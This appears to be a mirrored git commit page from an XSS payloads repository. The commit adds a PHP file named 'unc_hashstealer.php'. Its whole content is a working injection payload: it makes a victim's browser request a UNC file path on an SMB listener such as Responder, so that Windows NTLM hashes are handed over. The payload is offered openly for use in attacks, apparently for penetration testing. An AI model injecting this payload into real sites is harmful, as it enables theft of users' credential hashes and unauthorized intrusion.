mirror of
https://github.com/nettitude/xss_payloads.git
synced 2024-11-22 04:03:05 +00:00
Added UNC hash stealer
This commit is contained in:
parent
0e5e27f0b4
commit
298e52fccd
2 changed files with 8 additions and 0 deletions
8
unc_hashstealer.php
Executable file
8
unc_hashstealer.php
Executable file
|
@ -0,0 +1,8 @@
|
|||
<?php
|
||||
/**
|
||||
* Inject this in order to have the browser call out to an SMB endpoint, e.g. Responder
|
||||
*/
|
||||
$url = "file:///\\".$_SERVER["SERVER_ADDR"];
|
||||
echo "// $url\n";
|
||||
?>
|
||||
new Image().src="<?php echo $url; ?>";
|
Loading…
Reference in a new issue